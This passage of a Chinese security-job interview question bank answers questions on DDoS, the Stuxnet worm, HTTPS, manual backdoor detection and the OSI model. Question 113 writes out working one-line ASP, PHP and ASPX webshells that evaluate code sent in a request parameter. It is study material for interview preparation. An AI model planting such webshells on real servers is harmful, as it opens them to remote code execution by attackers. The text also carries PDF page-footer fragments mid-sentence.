安全服务面试-2

111.DDOS 的定义？

http://baike.baidu.com/link?url=hOeNhuaIj6tF9NY1wr2wbe9pIe52PaCJ5

KXTisdfPUK4j8beTktmVsRaH5hRjkcpq6FPouzRl2hbsbpEDO5HRAUYi_D1

Tsnu_q7in59xRasqHbmi1oYhEyVDVVn9ZcIcqRsZi5axo_HgkXBPioJx_#10 分布式拒绝服务

(DDoS:Distributed Denial of Service)攻击指借助于客户/服务

器技术，将多个计算机联合起来作为攻击平台，对一个或多个目标发动 DDoS

攻击，从而成倍地提高拒绝服务攻击的威力。通常，攻击者使用一个偷窃帐号将

DDoS 主控程序安装在一个计算机上，在一个设定的时间主控程序将与大量代理

程序通讯，代理程序已经被安装在网络上的许多计算机上。代理程序收到指令时

第 43 页 共 152 页 就发动攻击。利用客户/服务器技术，主控程序能在几秒钟内激活成百上千次代

理程序的运行。

112.震网病毒的定义？

指一种蠕虫病毒，是第一个专门定向攻击真实世界中基础（能源）设施的“蠕虫”

病毒，比如核电站，水坝，国家电网。只要电脑操作员将被病毒感染的 U 盘插

入 USB 接口，这种病毒就会在神不知鬼不觉的情况下(不会有任何其他操作要求

或者提示出现)取得一些工业用电脑系统的控制权。

与传统的电脑病毒相比，“震网”病毒不会通过窃取个人隐私信息牟利。无需借

助网络连接进行传播。这种病毒可以破坏世界各国的化工、发电和电力传输企业

所使用的核心生产控制电脑软件，并且代替其对工厂其他电脑“发号施令”。极

具毒性和破坏力。“震网”代码非常精密，主要有两个功能，一是使伊朗的离心

机运行失控，二是掩盖发生故障的情况，“谎报军情”，以“正常运转”记录回

传给管理部门，造成决策的误判。

113.常用的一句话木马？

asp 一句话木马： <%execute(request("value"))%>

php 一句话木马：

<?php @eval($_POST[value]);?>

变形： <?php $x=$_GET[‘z’];@eval(“$x;”);?>

aspx 一句话木马：

<%@ Page Language="Jscript"%>

<%eval(Request.Item["value"])%>

114.Https 的作用？

内容加密 建立一个信息安全通道，来保证数据传输的安全；

身份认证 确认网站的真实性

数据完整性 防止内容被第三方冒充或者篡改

HTTPS 和 HTTP 的区别

https 协议需要到 CA 申请证书。

http 是超文本传输协议，信息是明文传输；https 则是具有安全性的 ssl 加密传

第 44 页 共 152 页 输协议。http 和 https 使用的是完全不同的连接方式，用的端口也不一样，前者是 80，

后者是 443。

http 的连接很简单，是无状态的；HTTPS 协议是由 SSL+HTTP 协议构建的可进

行加密传输、身份认证的网络协议，比 http 协议安全。

115.手工查找后门木马的小技巧？

1、首先最需要注意的地方是系统的启动项，可以在“运行”-输入“msconfig

命令”在打开的系统配置实用程序里的启动列表查看，并且服务也要注意一下，

如果对电脑不是太熟悉的童鞋建议使用 360 安全卫士的开机加速功能，来查看

有无异常的可以启动项和服务项，因为在后门木马中 99%都会注册自己为系统

服务，达到开机自启动的目的，如果发现可疑项直接打开相应的路径，找到程序

文件，直接删除并且禁止自启动；

2、查看系统关键目录 system32 和系统安装目录 Windows 下的文件，xp 系统

下两者默认路径分别是 C:\WINDOWS\system32 和 C:\WINDOWS\。然后最

新修改的文件中有没有可疑的可执行文件或 dll 文件，这两个地方都是木马最喜

欢的藏身的地方了（小提示：一定要设置显示所有的文件的文件夹哦）。

3、观察网络连接是否存在异常，还有“运行”-“cmd”-“netstat -an”查看

有没有可疑或非正常程序的网络连接，如果对电脑不是很熟悉建议大家使用 360

的流量监控功能更加直观和方便，尤其注意一下远程连接的端口，如果有类似于 8000 等端

口就要注意了，8000 是灰鸽子的默认端口，记得有一次自己就在后

门木马测试中在网络连接中发现 8000 端口，当然意思不是说只要没有 8000 端

口的网络连接就一定安全，因为 8000 端口只是灰鸽子上线的默认端口，并且端

口是可以更改的。

通过以上方法，可以查找到电脑的一些可疑文件，如果确认无疑，就可以手工进

行删除了。当然还可以借助杀毒软件的力量。如果你真的中了木马后门，不用慌。

最好最彻底的方法是重装系统后，在安全模式下，利用最新病毒库的杀软进行查

杀。

116.描述 OSI（开放系统互联基本参考模型）七层结构？

分层的好处是利用层次结构可以把开放系统的信息交换问题分解到一系列容易

第 45 页 共 152 页 控制的软硬件模块－层中，而各层可以根据需要独立进行修改或扩充功能，同时，

有利于个不同制造厂家的设备互连，也有利于大家学习、理解数据通讯网络。

OSI 参考模型中不同层完成不同的功能，各层相互配合通过标准的接口进行通信。

第 7 层 应用层 ：OSI 中的最高层。为特定类型的网络应用提供了访问 OSI 环境

的手段。应用层确定进程之间通信的性质，以满足用户的需要。应用层不仅要提

供应用进程所需要的信息交换和远程操作，而且还要作为应用进程的用户代理，

来完成一些为进行信息交换所必需的功能。它包括：文件传送访问和管理 FTAM、

虚拟终端 VT、事务处理 TP、远程数据库访问 RDA、制造报文规范 MMS、目录

服务 DS 等协议；应用层能与应用程序界面沟通，以达到展示给用户的目的。

在

此常见的协议有:HTTP，HTTPS，FTP，TELNET，SSH，SMTP，POP3 等。

第 6 层 表示层 ：主要用于处理两个通信系统中交换信息的表示方式。为上层用户

解决用户信息的语法问题。它包括数据格式交换、数据加密与解密、数据压缩与

终端类型的转换。

第 5 层 会话层 ：在两个节点之间建立端连接。为端系统的应用程序之间提供了对

话控制机制。此服务包括建立连接是以全双工还是以半双工的方式进行设置，尽

管可以在层 4 中处理双工方式 ；会话层管理登入和注销过程。它具体管理两个

用户和进程之间的对话。如果在某一时刻只允许一个用户执行一项特定的操作，

会话层协议就会管理这些操作，如阻止两个用户同时更新数据库中的同一组数据。

第 4 层 传输层 ：—常规数据递送－面向连接或无连接。为会话层用户提供一个

端到端的可靠、透明和优化的数据传输服务机制。包括全双工或半双工、流控制

和错误恢复服务；传输层把消息分成若干个分组，并在接收端对它们进行重组。

不同的分组可以通过不同的连接传送到主机。这样既能获得较高的带宽，又不影

响会话层。在建立连接时传输层可以请求服务质量，该服务质量指定可接受的误

码率、延迟量、安全性等参数，还可以实现基于端到端的流量控制功能。

第 3 层 网络层 ：本层通过寻址来建立两个节点之间的连接，为源端的运输层送来

的分组，选择合适的路由和交换节点，正确无误地按照地址传送给目的端的运输

层。它包括通过互连网络来路由和中继数据 ；除了选择路由之外，网络层还负

责建立和维护连接，控制网络上的拥塞以及在必要的时候生成计费信息。

第 46 页 共 152 页 第 2 层 数据链路层 ：在此层将数据分帧，并处理流控制。屏蔽物理层，为网络层

提供一个数据链路的连接，在一条有可能出差错的物理连接上，进行几乎无差错的数据传输

（差错控制）。本层指定拓扑结构并提供硬件寻址。常用设备有网卡、

网桥、交换机；

第 1 层 物理层 ：处于 OSI 参考模型的最底层。物理层的主要功能是利用物理传

输介质为数据链路层提供物理连接，以便透明的传送比特流。常用设备有（各种

物理设备）集线器、中继器、调制解调器、网线、双绞线、同轴电缆。

数据发送时，从第七层传到第一层，接收数据则相反。

上三层总称应用层，用来控制软件方面。下四层总称数据流层，用来管理硬件。

除了物理层之外其他层都是用软件实现的。

数据在发至数据流层的时候将被拆分。

在传输层的数据叫段，网络层叫包，数据链路层叫帧，物理层叫比特流，这样的

叫法叫 PDU（协议数据单元）[2]

各层功能

(1)物理层(Physical Layer)

物理层是 OSI 参考模型的最低层，它利用传输介质为数据链路层提供物理连接。

它主要关心的是通过物理链路从一个节点向另一个节点传送比特流，物理链路可

能是铜线、卫星、微波或其他的通讯媒介。它关心的问题有：多少伏电压代表 1？

多少伏电压代表 0？时钟速率是多少？采用全双工还是半双工传输？总的来说

物理层关心的是链路的机械、电气、功能和规程特性。(2)数据链路层(Data Link Layer)

数据链路层是为网络层提供服务的，解决两个相邻结点之间的通信问题，传送的

协议数据单元称为数据帧。

数据帧中包含物理地址（又称 MAC 地址）、控制码、数据及校验码等信息。该

层的主要作用是通过校验、确认和反馈重发等手段，将不可靠的物理链路转换成

对网络层来说无差错的数据链路。

此外，数据链路层还要协调收发双方的数据传输速率，即进行流量控制，以防止

接收方因来不及处理发送方来的高速数据而导致缓冲器溢出及线路阻塞。

(3)网络层(Network Layer)

网络层是为传输层提供服务的，传送的协议数据单元称为数据包或分组。该层的

第 47 页 共 152 页 主要作用是解决如何使数据包通过各结点传送的问题，即通过路径选择算法（路

由）将数据包送到目的地。另外，为避免通信子网中出现过多的数据包而造成网

络阻塞，需要对流入的数据包数量进行控制（拥塞控制）。当数据包要跨越多个

通信子网才能到达目的地时，还要解决网际互连的问题。

(4)传输层(Transport Layer)

传输层的作用是为上层协议提供端到端的可靠和透明的数据传输服务，包括处理

差错控制和流量控制等问题。该层向高层屏蔽了下层数据通信的细节，使高层用

户看到的只是在两个传输实体间的一条主机到主机的、可由用户控制和设定的、

可靠的数据通路。传输层传送的协议数据单元称为段或报文。

(5)会话层(Session Layer)

会话层主要功能是管理和协调不同主机上各种进程之间的通信（对话），即负责

建立、管理和终止应用程序之间的会话。会话层得名的原因是它很类似于两个实

体间的会话概念。例如，一个交互的用户会话以登录到计算机开始，以注销结束。

(6)表示层(Presentation Layer)

表示层处理流经结点的数据编码的表示方式问题，以保证一个系统应用层发出的

信息可被另一系统的应用层读出。如果必要，该层可提供一种标准表示形式，用

于将计算机内部的多种数据表示格式转换成网络通信中采用的标准表示形式。数

据压缩和加密也是表示层可提供的转换功能之一。

(7)应用层(Application Layer)

应用层是 OSI 参考模型的最高层，是用户与网络的接口。该层通过应用程序来

完成网络用户的应用需求，如文件传输、收发电子邮件等。